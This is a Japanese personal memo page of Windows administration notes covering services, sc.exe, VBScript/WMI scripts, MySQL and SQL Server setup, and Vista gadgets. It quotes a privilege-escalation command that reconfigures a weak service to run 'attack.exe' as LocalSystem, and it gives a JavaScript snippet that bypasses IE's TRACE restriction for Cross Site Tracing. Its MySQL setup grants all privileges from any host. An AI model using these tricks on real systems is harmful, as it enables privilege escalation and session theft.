メモ帖
間違いの指摘は 
へ。※スパム排除の為 @yahoo.com,@hotmail.com は受信拒否しています。
↑きゃっとまーくめーるを利用させていただきました。
情報が多くなっていますので、検索は[Ctrl]+[F]で。(^^;
そのうち分類します…
修正している場合がるのでキャッシュから見ている場合は、ご注意を。
ここ
以下分離
DNS と ActiveDirectory 関連
Windows Server 2003 SP1 関連
リモートデスクトップ 関連
WSC 関連
SMTP 送信関連
IIS 関連
ASP 関連
VHD 仮想化関連
TOP
Windows2000でアプリケーションをサービス化
まず、instsrv.exeとsrvany.exeを入手する。 検索エンジンで調べると見つかると思います。
あるいは、サービスキットからインストールすることもできます。
試していませんが、Windows Server 2003 Resource Kit Tools にも含まれています。
次に、以下のコマンドを実行。
cd (instsrv.exeのあるフォルダ)
instsrv (ServiceName) (Full Path)\srvany.exe
これで、空のサービスが作成されます。
そして、regedit.exeで
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\(ServiceName)\Parameters
を見つけ、キー(Parameters)の追加を行う。 そのキーに以下の文字列を追加。
Application (アプリケーションのパス)
AppDirectory (アプリケーションのあるフォルダ)
最後に、[コントロールパネル]-[管理ツール]-[サービス]から 自分で作ったサービスを選択し、[開始]される。
instsrv.exe、srvany.exeと同等の機能として
sexeというものもあります。
FireDaemon もありますが、一部のアンチウイルスでリスクウェアとして検出されます。
また、リソース キットに含まれている SC ツール (Sc.exe) を使用すると
コマンド ラインからリモートでサービスを作成する事が出来るようです。
Sc.exe を使用して Windows サービスを作成する方法
svchost.exeプロセスとは?―― sc.exeでサービスをコマンドラインから制御する ――(@IT)
tftpサービスを起動する で sc.exeを使った登録方法が詳解されています。
Windows Vista の場合で、Administrator アカウントでも登録できない(UAC が有効)場合は解除しておく必要がある。
コントロールパネル>ユーザアカウント>ユーザアカウント制限の有効化または無効化
>「ユーザアカウント制御(UAC)を使ってコンピュータの保護に役立たせる」を OFF にして再起動。
Windows Access Control Demystied
http://www.cs.princeton.edu/~sudhakar/papers/winval.pdf
local SYSTEM 権限で attack.exe 追加。
$ sc config weakService binPath=c:\attack.exe obj=".\LocalSystem" password=""
$ sc stop weakService
$ sc start weakService
ってな事ができちゃうって話。
※ SC.EXE でサービスに対応してないプログラムをサービス登録すると起動してすぐ停止しますのでご注意を。
サービスの登録を解除するツール
Delete Server (delsrv.exe)
Scriptomatic ツール
WMI Administrative Tools
Windows Management Insturmentation コマンド ライン (WMIC) ツール
GUIを超えて進化するWindows管理ツール(2)
ってなのも。
VBScript を使った 登録 仮想サービス Db.exe をインストールします。
Const OWN_PROCESS = 16
Const NOT_INTERACTIVE = False
Const NORMAL_ERROR_CONTROL = 2
strComputer = "."
Set objWMIService = GetObject("winmgmts:" & _
"{impersonationLevel=Impersonate}!\\" & strComputer & "\root\cimv2")
Set objService = objWMIService.Get("Win32_BaseService")
errReturn = objService.Create("DbService", _
"Personnel Database", _
"c:\windows\system32\db.exe", _
OWN_PROCESS, _
NORMAL_ERROR_CONTROL, _
"Manual", _
NOT_INTERACTIVE, _
"NT AUTHORITY\LocalService", "")
Wscript.Echo errReturn
Wmiprvse.exe プロセスは、 Windows Server 2003 を実行しているドメイン コントローラでの応答を停止します。
スプリクトセンターに揃っていますのでそちらから必要な物を見つけ出して下さい。
スプリクトセンター
Hey, Scripting Guy!
Windows Scripting Host Laboratory
レジストリ キーの変更を監視する方法はありますか
http://www.microsoft.com/japan/technet/scriptcenter/resources/qanda/jul05/hey0711.mspx
Microsoft Windows レジストリの説明
http://support.microsoft.com/kb/256986
Win32 Classes
http://msdn.microsoft.com/en-us/library/aa394084(VS.85).aspx
タスクを使い定期的にプロセスを監視すると幸せになれるかも。
ちなみに、AT、Schtasks コマンドを使っても登録できます。
タスク スケジューラの概要
タスクは、特定の Windows Server 2003 ベースのコンピュータで Schtasks コマンド ライン ツールを使用する月で実行されません。
非同期で監視する場合は Doctor Scripto のスクリプト ショップ: 非同期イベントの監視によるペストウェアの制御 をチェック。
サービスを自作する場合は
Windows サービスの作成
Visual Basic .NET または Visual Basic 2005 で Windows サービスのセットアップ プロジェクトを作成する方法
辺りを。
WScriptオブジェクトを利用する(1) これは、WSC にリンクした方がいいかな。
メモ帳 がタスクに無い場合、メモ帳を起動する
Const strComputer = "."
Const FileName = "notepad.exe"
If ProcessCheck(FileName) = False Then
Wscript.Echo ProcessCreate(FileName)
End If
Wscript.Quit
'プロセスチェック
Function ProcessCheck(FN)
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colProcessList = objWMIService.ExecQuery("Select * from Win32_Process Where Name = '" & FN & "'")
If colProcessList.Count=0 Then
ProcessCheck = False
Else
ProcessCheck = True
End If
End Function
'プロセスの作成
Function ProcessCreate(FN)
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_Process")
Error = objWMIService.Create(FN, null, null, intProcessID)
' ~~~~
' ↑DLL(Dynamic Link Library)を呼び出すアプリケーションは、作業フォルダの指定をしないとアプリケーションが起動できない場合があります。
If Error = 0 Then
'起動成功
ProcessCreate = intProcessID
Else
'起動失敗
ProcessCreate = False
End If
End Function
WMI の クラスは http://msdn.microsoft.com/en-us/library/aa394375(VS.85).aspx で確認。
アクティブ化して SendKey でキーコマンドを送りたい場合は
http://www.atmarkit.co.jp/fwin2k/tutor/cformwsh14/cformwsh14_01.html
を参考に。
WSH から MOM にしたい場合は
http://www.microsoft.com/japan/technet/scriptcenter/topics/mom/mom1.mspx を参考に。
Visual Basic Scripting Edition VBScript のステートメント
http://msdn.microsoft.com/library/ja/script56/html/vsstmExecuteGlobal.asp
Windows 2003 用の Windows Script 5.6
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=887fce82-e3f5-4289-a5e3-6cbb818623aa
Windows 2000 および Windows XP 用の Windows Script 5.6
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=c717d943-7e4b-4622-86eb-95a22b832caa
Windows 98、Windows Millennium Edition (Windows Me)、および Windows NT 4.0 用の Windows Script 5.6
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=0a8a18f6-249c-4a72-bfcf-fc6af26dc390
Windows Script
VBScript(MSDN)
VBScript ランゲージ リファレンス
注意
Windows 2000 でスケジュールされたタスクを削除すると、エラー メッセージ "Cannot delete this scheduled job" が表示される
Windows Script 5.6 をアップデートすると、Windows Update Web サイトでダウンロードが停止またはフリーズする
Microsoft VBScript/JScript Script Decoding Buffer Overflow
そのた
Microsoft Script Debugger 1.0
Vbsedit 3.3
[HOWTO] Windows 2000 で特定の Windows プログラムの実行を制限する方法
WSH を始めよう(@IT)
Windows管理者のためのWindows Script Host入門(@IT)
WMIを使うスクリプトを簡単に作成する
次世代Windowsシェル「Windows PowerShell」を試す(前編)
Scripting with Windows PowerShell
Windows PowerShell
WSHとの比較で知るPowerShell
Windows PowerShell宣言! (単行本)(アマゾン)
スプリクトの実行環境
スプリクト言語
・VBScript 拡張子は .vbs
・JScript 拡張子は .js ※ Java Script とは別物。
LL(ライトウェイト・ランゲージ)の 4 大言語
・Perl 拡張子は .ps ※ 利用するには ActivePerl が必要。
http://www.activestate.com/
・PHP 拡張子は .php ※ 利用するには ActiveScript 用の DLL (php5activescript.dll) が必要。
http://www.php.gr.jp/
MS、Windowsサーバ上でのPHP環境サポートでZendと提携
http://www.itmedia.co.jp/enterprise/articles/0611/01/news023.html
・Python 拡張子は .pys ※ 利用するには ActivePython が必要
http://www.activestate.com/
[IIS]IIS で python スプリクトを使用する
・Ruby 拡張子は .rb ※ 利用するには ActiveScript Ruby が必要。
http://www.geocities.co.jp/SiliconValley-PaloAlto/9251/ruby/
IIS から利用する場合に「FastCGI for IIS」を利用すると高速化されるようです。 http://www.iis.net/
これを利用する事により CGI プログラムのプロセスをメモリ上に常駐させ、要求ごとのプロセスの起動、終了のオーバーヘッドをなくす事が出来ます。
IIS5.1 以降のバージョンで利用可能。(64bit版あり)
セットアップ方法は IIS 関連 に書く予定。
特定のサービスを再起動(VBS)
Dim WshShell
Dim objWMIService, colServices, objService
Dim errReturnCode
Const ServiceName = "Service"
Set objWMIService = GetObject("winmgmts:"_
& "{impersonationLevel=impersonate}!\\.\root\cimv2")
Set colServices = objWMIService.ExecQuery _
("Select * from Win32_Service where Name='" & ServiceName & "'")
For each objService in colServices
'自動開始サービスの停止
errReturnCode = objService.StopService()
Wscript.Sleep 20000
'停止状態にある自動開始サービスの再開
objService.StartService()
Next
'イベントログに書き込み
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.LogEvent 16, ServiceName & "を再起動しました。"
Set WshShell = Nothing
※イベントログのメッセージに 「 % 」を含んだ文字列を出力できない
タスクを使って VBS を起動した場合に表示される コマンドライン コンソール の消し方(2003 Server)
C:\VBS\TEST.VBS が本体とする。
下記を TEST.WSH で保存し、これをタスクに登録する。
----------------------
[ScriptFile]
Path=C:\VBS\TEST.VBS
[Options]
Timeout=0
DisplayLogo=0
----------------------
※スプリクトファイルを右クリックすると、プロパティに「スプリクト」という項目があります。
WSH はそこで設定すると自動で作られます。
2000 や XP は .VBS のプロパティのスプリクトタブの中に、「コマンドコンソールでのスプリクト実行時にロゴを表示する」のチェックをはずせば OK 上記ファイルが作られます。
あと。
コンピュータの管理(マイコンピュータを右クリックのメニューから管理を選択)の
パフォーマンス ログと警告、サービスからも特定のプログラムを実行したりできます。
Wscript.Echo を実行するとコマンドプロンプトで結果が表示される場合
VBS ファイルの関連付けが Wscript.exe から CScript.exe に変更されているとそうなるようです。
ファイルの種類から、vbs をチェックしてみましょう。
詳細設定を開いて「新規」を選択し
アクション:実行(Wscript)
アクションを実行するアプリケーション:c:\Windows\system32\Wscript.exe "%1" %*
を追加すれば、VBSファイルの右クリックで、「実行(Wscript)」が追加されているはずです。
ちなみに CScript.exe で実行したい場合も同様に
アクション:実行(Wscript)
アクションを実行するアプリケーション:c:\Windows\system32\Cscript.exe "%1" %*
を追加すれば、VBSファイルの右クリックで、「実行(Cscript)」が追加されているはずです。
※ファイルのパスは環境に合わせて変更すること。
Cscript を利用する場合は StdIn, StdOut, StdErr の各プロパティを利用した
標準入力、標準出力、標準エラー出力が利用できます。
例)
For i=1 To 10
WScript.StdOut.Write(".")
WScript.Sleep 100
Next
wait.vbs で保存した場合は、コマンドシェルから cscript wait.vbs で動作確認できます。
参考
http://www.atmarkit.co.jp/fwin2k/operation/wsh03/wsh03_03.html
コマンド シェルの概要
デフォルトを切り替えるにはコマンドプロンプトから
c:\>cscript //H:CScript //S
または
c:\>cscript //H:WScript //S
Windows Script 5.7 for Windows XP
http://www.microsoft.com/downloads/details.aspx?FamilyID=47809025-D896-482E-A0D6-524E7E844D81&displaylang=en
Windows スクリプト 5.7 の Windows XP の説明
http://support.microsoft.com/kb/952830
Windows Script 5.7 for Windows Server 2003
http://www.microsoft.com/downloads/details.aspx?FamilyID=f00cb8c0-32e9-411d-a896-f2cd5ef21eb4&displaylang=en
※CScript と WScript を切り替えるコマンドが逆になってます。(バグ)
タスク スケジューラ に自動登録する。
とりあえず、こなへん。
Task Scheduler Using VBScript
http://www.microsoft.com/downloads/details.aspx?FamilyID=601d75e2-f907-4e51-ad88-adb818df1d27&DisplayLang=en
壊れたMDBファイルを修復するには
アメリカのMSのホームページにjetcompという修復ソフトがあります。
access2000,97は修復出来ます。
[AC97] 破壊したデータベースの修復方法
破損した Jet 4.0 データベースの Access 2000 でのトラブルシューティングと修復の方法
[ACC2002] Jet 4.0 の使用時にデータベースの破損を最小限に抑える方法
Microsoft Jet 4.0 データベース エンジン用の最新の Service Pack の入手方法
ダウンロード センターで入手可能な Microsoft Jet 4.0 Service Pack 8 レプリケーション ファイルの更新版
※ Opportunistic Lock を無効にすると壊れにくくなるようです。
Windows で Opportunistic Lock を構成する
OOo を使ってみるのもいいかも。
多数の不具合を改善したOpenOffice.org 2.0.2日本語版公開,CD起動版も
http://itpro.nikkeibp.co.jp/article/NEWS/20060403/234346/
「OpenOffice.org Base」はMicrosoft Accessの代わりにはならない (1/2)
http://www.itmedia.co.jp/enterprise/articles/0810/22/news079.html
リンク先のHTMLソースを表示してみる
view-source:http://www.netdive.jp/のように、URLのまえにview-source:をつけてURLを指定すると、そのHTMLソースが表示されます。
最近は出来ないようで・・・(ファイアフォックスでは有効)
確認用にソースを表示する物をつくってみました。
※適当につくっていますので、たまに反応しなくなります。
そのうち下記の実験も出来る様に拡張するよてい。
メソッド 機能
HTTP/0.9 GET URIで指定したリソースを取得します。
HTTP/1.0 HEAD URIで指定したリソースのレスポンスヘッダのみを取得します。
HTTP/1.0 POST URIで指定したサーバーのコマンドに対してデーターを転送します。
HTTP/1.1 PUT URIで指定したリソースを、転送するデータで置き換えます。
HTTP/1.1 DELETE URIで指定したりソースを削除します。
HTTP/1.1 OPTIONS 使用できるメソッドやオプションの一覧を取得します。
HTTP/1.1 TRACE サーバーやプロクシの動作を診断するための情報を返答します。
HTTP/1.1 CONNECT プロクシをトンネルに切り替えます。
HTTP/1.1 PATCH
HTTP/1.1 LINK
HTTP/1.1 UNLINK
If-Modified-Since 更新されたかどうかを調べる ヘッダ。
If-Modified-Since: Sun, 26 Jun 2005 12:00:00 GMT
もし、コンテンツファイルが更新されていなければ、サーバーはその旨を
304 Not Modified
というレスポンスヘッダを返す。(コンテンツのデータは返しません。)
付けなかった場合は、
HTTP/1.1 200 OK
が返ります。
も調べるようにしたいなぁ・・・
Fiddler で HTTP プロトコル解析が出来るので必要ないや。。。
URLTracer http://research.microsoft.com/URLTracer/ てのも。
Fiddler は Web テストのオーサリングおよびデバッグの技法 でも紹介されてますね。
Fiddlerプラグイン Watcher クロスドメインの確認が出来る。
http://blogs.msdn.com/sdl/archive/2009/04/16/watcher-a-new-web-security-testing-tool.aspx
第2回 リクエストをいじれば脆弱性の仕組みが見えるのだ!
http://www.atmarkit.co.jp/fsecurity/rensai/httpbasic02/httpbasic01.html
IE7Pro を入れると動的に更新されたソースの確認が出来るので、それとセットで入れておくと便利かも。
適当に作っているものに Whois も在ったりするんだけど、、、これも、作り直したほうがよさげ。
ちなみに Whois の問い合わせは ポート 43 に IP 投げる。
telnet の場合は telnet whois.apnic.net 43 で接続後に IPアドレスを打ち込んでえんたー。
※これは、kojikoji.net の下の方に実装しました。接続した IP 情報を表示するだけですけどね...
用語「Cross Site Tracing」@鳩丸ぐろっさり (用語集)
http://bakera.jp/hatomaru.aspx/glossary/00430072006f0073007300200053006900740065002000540072006100630069006e0067
# HTTP/1.1 の TRACE を使った攻撃についての説明
ログを見てると、OPTIONS や TRACE が飛んできてますねぇ…
IIS6.0 も URLScan 入れておいた方がいいかも。
Windows Server 2003 + IIS6.0 で URLScan2.5 を導入する方法は下のほうで書いてます。
※IE 6.0 SP2になって XmlHttpRequest オブジェクトでの TRACE のサポートを、こっそり取り除いたようですが
クライアントサイドで XmlHttpRequest の TRACE コマンドが利用出来ないかというと先頭に改行コードを埋め込む事で
回避できちゃうみたいです。だめじゃん。
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.open("\r\nTRACE","/",false);
x.setRequestHeader("Max-Forwards","0");
x.send();
alert(x.responseText);
●互換モードを使う
WIndows95か、WindowsNT4.0 SP5互換として動作させる方法です。
設定するにはServicePace2が導入されている必要が有ります。
やり方は簡単で、c:\winnt\apppatch\slayerui.dll をレジストリに登録して、再起動するだけです。
regsvr32 %systemroot%\apppatch\slayerui.dll
↑こんな感じで登録します。
互換性モードを設定したいアプリケーションのショートカットなどのプロパティを参照し
「Compatibility」タブをクリックする。「互換モードで実行する」にチェックを入れれば
Windows95かWindowsNT4.0 SP5互換として利用可能となります。
●OS情報をごまかす
Windows 2000のシステムCD-ROM内の「SUPPORT」フォルダにある APCOMPAT.EXE をクリックすると、それらしいものが起動します。
設定出来るのは
Windows 2000
Windows NT4 SP3
Windows NT4 SP4
WIndows NT4 SP5
Windows98
Windows95
です。
Windows Server 2003 で互換モード テクノロジを使用する方法
http://support.microsoft.com/kb/324265/ja
Windows Server 2003 でプログラム互換性ウィザードを使用する方法
http://support.microsoft.com/kb/317517/ja
Microsoft OLE DB Provider for SQL Server での接続方法
Windows認証では
Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=データベース名;Data Source=サーバー名
SQL認証では
Provider=SQLOLEDB.1;Password=パスワード;Persist Security Info=True;User ID=ユーザID;Initial Catalog=データベース名;Data Source=サーバー名
Persist Security Info を true または yes に設定すると、ユーザー ID やパスワードなどのセキュリティ関連情報は
接続を開いた後も接続から取得できるのでセキュリティを向上させるには、Persist Security Info を false にしておく。
Persist Security Info は、既定では false に設定されている。
TCP/1433 以外での接続は接続文字列に "Server=ComputerName, PortNumber" を含める。
[PRB] 1433 以外のポートで SQL Server に接続できない
[HOW TO] 名前付きパイプを経由した Microsoft SQL Server への接続
[HOW TO] 信頼関係接続を使用して別々のコンピュータ上の IIS と SQL Server を接続する方法
Oracle
Provider=MSDAORA.1;Data Source=path to database on server
MySQL は
ODBC
http://www.mysql.com/downloads/api-myodbc-3.51.html
.Open "DRIVER={MySQL ODBC 3.51 Driver};SERVER=localhost;Port=3306;Uid=root;Password=;Database=test;"
※ 接続できれば、ACCESS からの利用も可能です。
詳しくは ODBC によるMySQLの操作 http://www.tryhp.net/ODBCMySQL.htm
Microsoft インデックス サービス
Provider=MSIDXS.1;Data Source=path to file
この辺りを参考に
データ ソースにアクセスする
[MDAC/SQL Server]SQL Server/MSDE の認証における問題解決方法
第 4 章 SQL Server 2000 のユーザーと権限 〜 SQL Server 一年生 - データベース基礎編 - 〜
リモートからSQL Server 2000にアクセスできない?
SQL Server 2000 の Kerberos サポート
2000 から 2003 Server にアップグレードした場合に SQL Server と通信出来なくなる事があるようで
Oledb32.dll バージョンの相違による物との事。
Windows 2000 から Windows Server 2003 へオペレーティング システムをアップグレードする場合、 Oledb32.dll ファイルがアップグレードされていません。
MDAC のバージョンチェック。。。 How to check for MDAC version http://support.microsoft.com/kb/301202
MySQL4.0 の設定
■MySQL サービス開始
winmysqladmin.exe を実行
■日本語の設定
my.ini
[mysqld]
basedir=c:\mysql
datadir=c:\mysql\data
language=c:/mysql/share/japanese
default-character-set=sjis
[mysql]
default-character-set=sjis
[mysql-dump]
default-character-set=sjis
[client]
default-character-set=sjis
※ winmysqladmin.exe の my.ini Setup タグから変更可能。
■外部から接続出来る設定
コマンドプロンプトから rootユーザでmysqlに接続
mysql -u root
パスワードが掛かっている場合は
mysql -u root -p パスワード
C:\mysql\bin>mysql -u root
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 72 to server version: 4.0.26-nt
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql>
この後、以下の2つのコマンドを実行する。
GRANT ALL PRIVILEGES ON *.* TO [ユーザID]@"%" IDENTIFIED BY '[パスワード]' WITH GRANT OPTION;
GRANT ALL PRIVILEGES ON *.* TO [ユーザID]@localhost IDENTIFIED BY '[パスワード]' WITH GRANT OPTION;
※ユーザIDとパスワードには任意の値を入力
VARCHAR(1024)
あら、出来ないのね… 255までですか、そうですか。。。
BLOB で解決?LOGTEXT でいいのか。
InnoDB トランザクション可能なテーブル型。行ロックを行うならば必須
MyISAM 非トランザクションテーブル
INDEX
ORDER BY するキーを設定しておく。
付けると早くなる。
http://dev.mysql.com/doc/refman/4.1/ja/create-index.html
クエリキャッシュ無効
SELECT SQL_NO_CACHE * FROM
1度しか発行しないから無効化しとくべきか…
参考
http://homepage2.nifty.com/sak/w_sak3/doc/sysbrd/mysql_01.htm
http://pc.okwave.jp/kotaeru.php3?q=1283428
http://question.woman.excite.co.jp/kotaeru.php3?q=1908753
http://www.limy.org/program/db/mysql/index.html
ツール
かねやんMySQLAdmin
http://www.mmdb.net/m_kaneko/
Common SQL Environment
http://www.vector.co.jp/soft/win95/business/se180732.html
MySQL-Front 安価な商用アプリケーション(30日の試用期間がある)
http://www.mysqlfront.de/
Set RS = CreateObject("ADODB.Recordset")
RS.CursorType = 3
RS.CursorLocation = 2
RS.LockType = 2
RS.MaxRecord = 1
RS.Open "SELECT * FROM T_TEST", DB
あれれ、レコードロックされてなさげ…
ああ、行単位でロック出来ないのね、、、
MySQL4.0 をアンインストール
アプリケーションの追加と削除から 削除すると、サービスが残ったままになるので
C:\mysql\bin\>mysqld-max-nt --remove MySQL
を実行してから、削除する。
参考
http://www.s-m-l.org/dev/mysql_php.html
http://golgotha.xrea.jp/archives/2005/09/
JOIN で発行されるデータがで大量の場合は join_buffer を増やすと良いらしい。
遅いので最適化を考える。。。
WEBサーバ
・HTTP圧縮してデータ量を減らす。
・不要なHTTPレスポンスヘッダーは消す。
・滅多に更新されない静的なデータはキャッシュコントロール。(.CSSとか.HTMLとか)
・リンク切れのチェック。
・404エラーページの表示の最適化。
・画像データだけ分離して別サーバに置く。(TCPコネクション数が減る)
・KeepAlive は OFF にする。(アクセス数が多い場合有効)
もっとも複数のサーバがあって、TCP コネクション数が少ない場合は ON がいい
・サブネット化してブロードキャストパケットを制限
DB
・MySQL の 「インデックス」と「NOT NULL制約」を正しく設計しているか。。
・コネクションプールは適切か。
・lock のかかり方は正しいか。(SQL Server は select の度にロックされる)
・DB のチューニング。
ハードウェアなら、ディスクアクセスに関しては SCSI に変えるだけで転送速度が倍にはなる。
133 > 320
変わりつつあるようだけど。
サーバ内蔵ハードディスクの最新トレンド(2006年版)
http://www.atmarkit.co.jp/fsys/kaisetsu/070server_hdd2006/server_hdd2006.html
MySQLの常識を知りセットアップしてJSPからDB操作 (1/3) - @IT
http://www.atmarkit.co.jp/fjava/rensai4/webjousiki08/webjousiki08_1.html
マイクロソフト、「MySQL」から「SQL Server」への移行ツールを公開
http://japan.zdnet.com/sp/feature/07microsoft/story/0,3800083079,20406451,00.htm
Vista の新機能の一つで特徴的な物にガジェットがあります。
ガジェットは、JScript, JavaScript, CSS, DHTML などの Web ページを応用した物で作成されています。
ガジェットを格納するフォルダ
c:\ユーザー\[username]\AppData\Local\Microsoft\Windows Sidebar\Gadgets
※AppData は隠し属性になっています。
ガジェットを構成するファイル
sample.gadget ※フォルダ .gadget で終わらせる事。
gadget.xml マニフェストファイル名
※Windows は gadget.xml に記録された情報を元にガジェットを認識し
そのガジェットを「ガジェットギャラリー」に追加します。
sample.html
配布する場合は、上記のファイルを ZIP 圧縮し、拡張子を .gadget に変更する。
gadget.xml-------------------------------------------------------
<?xml version="1.0" encoding="utf-8" ?>
<gadget>
<name>sample gadget</name>
<version>1.0.0.0</version>
<icons>
<icon height="270px" width="201px" src="sample.jpg" />
</icons>
<hosts>
<host name="sidebar">
<base type="HTML" src="sample.html" />
<permissions>Full</permissions>
<platform minPlatformVersion="1.0" />
</host>
</hosts>
</gadget>
-----------------------------------------------------------------
encoding="utf-8" としているので、保存時は必ず utf-8 にする事。
ルート要素は <gadget> で必ず、子要素として <name>, <version>, <hosts> が必要。
<name> 要素には、ガジェットギャラリーに表示される名前
<version> 要素には、ガジェットのバージョンを記述(バージョンは 4 桁までで 0-9 の値)
<icons> 要素は必須ではなく属性も無い。子要素に <icon> があり、その src 属性に
ガジェットギャラリーに表示する画像ファイルを指定する。(jpg, gif, png で ico は確か正しく動作しないので注意)
height、width属性には、その画像サイズの縦横幅を指定。
<hosts> 要素は、必ず一つ以上の <host> 要素を持つ。
<hosts> 要素自体には属性は無い。
<host> 要素の name 属性には必ず「sidebar」を指定する。
<base> 要素には、type、src 属性が必要で type 属性にはガジェットのファイルの種類
src 属性にはファイル名(ここでは sample.html)を指定する。
<permissions> 要素は、必ず「Full」と指定。
<platform> 要素の minPlatformVersion 属性にはガジェットを実行する為に必要な Windows サイドバーの最小バージョンを指定する。(現時点では 1.0)
他に使える要素については http://msdn2.microsoft.com/en-us/library/aa965879.aspx
sample.html
適当になんか作成で…
40,000個以上のアイコンをシンプルなインターフェースで検索できる『iconlet』
http://www.popxpop.com/archives/2007/06/40000iconlet.html
Windows Vistaガジェットプログラミング (単行本) (アマゾン)
※ Windows Presentation Foundation (WPF) も下の方に少し。
MSXML で PROXY を利用したい
コマンドプロンプトで、「proxycfg.exe」を利用すると出来ます。
proxycfg.exe -p proxy.sphere.ad.jp:8080 "<local>"
実行した場合は下記メッセージが出ます。
更新されたプロキシ設定
現在の WinHTTP プロキシ設定:
HKEY_LOCAL_MACHINE\
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\
WinHttpSettings :
プロキシ サーバー: proxy.sphere.ad.jp:8080
バイパス一覧 : <local>
解除は
proxycfg -d
※ Windows Update もこの設定で通信するようになるので注意。
[WU] Windows Update で利用するプロキシについて
Windows Server 2003、Windows XP、Windows 2000 用のバックグラウンド インテリジェント転送サービス (BITS) 2.0 および WinHTTP 5.1 を含む更新プログラム パッケージ
バックグラウンド インテリジェンス転送サービス(Word)
現在 Windows Server 2003 と Windows XP のバックグラウンド インテリジェント転送サービス(BITS)の更新パッケージが利用できます。
・カスタム HTTP ヘッダーのサポート。
・証明書ベースのクライアント認証が安全な HTTP トランスポートに役立つサポート。
・バージョン 6(IPv6)の IP をサポートします。
・強化されたアップロード パフォーマンス。
MSXML4.0 SP2をインストールするとProxycfg.exeが追加されますが MSXML 4.0 Service Pack 2 (Microsoft XML Core Services)
Proxycfg.exe についてはバグ(と言うかファイルが無い)があった気がするので(このサイトの何処かに書いた気がする。。。)探してください。
MSXML6.0 が公開されてます。
Microsoft Core XML Services (MSXML) 6.0
http://www.microsoft.com/downloads/details.aspx?familyid=993c0bcf-3bcf-4009-be21-27e85e1857b1&displaylang=en
Microsoft XML Core Services 6.0 RTM の脆弱性により、リモートでコードが実行される可能性がある (925673)
http://www.microsoft.com/downloads/details.aspx?FamilyID=fd513435-fa6d-407c-bedc-5fd03e5b7d6c&DisplayLang=ja
Microsoft XML パーサーのバージョン一覧
http://support.microsoft.com/default.aspx?scid=kb;ja;269238
XML
http://www.microsoft.com/japan/msdn/xml/default.asp
PRB:「プロキシ認証が必要」の ServerXMLHTTP オブジェクトのエラー メッセージ
http://support.microsoft.com/kb/315909/ja
一般的なプロキシサーバのポート
TCP/1080
TCP/3128
TCP/8000
TCP/8080
TCP/8088
TCP/10080
代表的な well-known ポート
20 FTP(データ転送)
21 FTP(制御)
23 Telnet
25 SMTP
53 DNS
80 HTTP
110 POP3
119 NNTP(Network News)
123 NTP(Network Time)
INSERT 後に Autonumber フィールドの値を取得する方法
@@IDENTITY を利用する事で取得可能です。
"SELECT @@IDENTITY AS オートナンバーフィールド"
※この操作を実行できるのは、Jet 4.0 OLE DB プロバイダおよび Microsoft Access 2000 以降だけです。
ASP で vartype 14(10進数)が帰ってくるようになった?
CONVERT(int,@@IDENTITY) にしないと駄目っぽい。
CREATE PROCEDURE InsertCategory
@CategoryName nchar(15),
@Identity int OUT
AS
INSERT INTO Categories (CategoryName) VALUES(@CategoryName)
SET @Identity = SCOPE_IDENTITY()
ID 値および Autonumber 値の取得
SQL Server 2005 の場合は OUTPUT が利用できるみたい。
http://msdn2.microsoft.com/ja-jp/library/ms177564.aspx
INSERT table OUTPUT tableID INTO tDATE VALUES (GETDATE());
こんな感じ?
Active Server Pages で SQL Server にアクセスする方法
Active Server Pages で SQL Server にアクセスする方法 を参考に。
ADO で SQL Server のストアド プロシージャの値を取得
ここを参考に。
ADO で SQL Server のストアド プロシージャの値を取得する方法
ASP から SQL Server のストアド プロシージャを呼び出す方法
ここを参考に。
ASP から SQL Server のストアド プロシージャを呼び出す方法
こっちで少し書いています。
SQL Server データベースのトランザクション ログが突然拡張されないようにする方法
ここを参考に。
SQL Server データベースのトランザクション ログが突然拡張されないようにする方法
[INF] SQL Server でトランザクション ログが予期しない大きさになるか、いっぱいになる
SQL Server 2000 のインストールに失敗した時の正しいアンインストール方法
ここを参考に。
SQL Server 2000 の既定のインスタンス、名前付きインスタンス、または仮想インスタンスを手動でアンインストールする方法
OLEプログラムID
ActiveXコントロールのOLEプログラムID
CheckBox Forms.CheckBox.1
ComboBox Forms.ComboBox.1
CommandButton Forms.CommandButton.1
Frame Forms.Frame.1
Image Forms.Image.1
Label Forms.Label.1
ListBox Forms.ListBox.1
MultiPage Forms.MultiPage.1
OptionButton Forms.OptionButton.1
ScrollBar Forms.ScrollBar.1
SpinButton Forms.SpinButton.1
TabStrip Forms.TabStrip.1
TextBox Forms.TextBox.1
ToggleButton Forms.ToggleButton.1
AccessのOLEプログラムID
Application Access.Application、Access.Application.9
CurrentData Access.CodeData、Access.CurrentData
CurrentProject Access.CodeProject、Access.CurrentProject
DefaultWebOptions Access.DefaultWebOptions
ExcelのOLEプログラムID
Application Excel.Application、Excel.Application.9
Workbook Excel.AddIn
Workbook Excel.Chart、Excel.Chart.8 (グラフ用とそのデータ用の2枚のワークシートが含まれるワークブックを取得。グラフのワークシートがアクティブなワークシートに)
Workbook Excel.Sheet、Excel.Sheet.8 (1枚のワークシートが含まれるブックを取得)
Microsoft GraphのOLEプログラムID
Application MSGraph.Application、MSGraph.Application.8
Chart MSGraph.Chart、MSGraph.Chart.8
Office WebコンポーネントのOLEプログラムID
ChartSpace OWC.Chart、OWC.Chart.9
DataSourceControl OWC.DataSourceControl、OWC.DataSourceControl.9
ExpandControl OWC.ExpandControl、OWC.ExpandControl.9
PivotTable OWC.PivotTable、OWC.PivotTable.9
RecordNavigationControl OWC.RecordNavigationControl、OWC.RecordNavigationControl.9
Spreadsheet OWC.Spreadsheet、OWC.Spreadsheet.9
OutlookのOLEプログラムID
Application Outlook.Application、Outlook.Application.9
PowerPointのOLEプログラムID
Application PowerPoint.Application、PowerPoint.Application.9
WordのOLEプログラムID
Application Word.Application、Word.Application.9
Document Word.Document、Word.Document.9、Word.Template.8
Global Word.Global
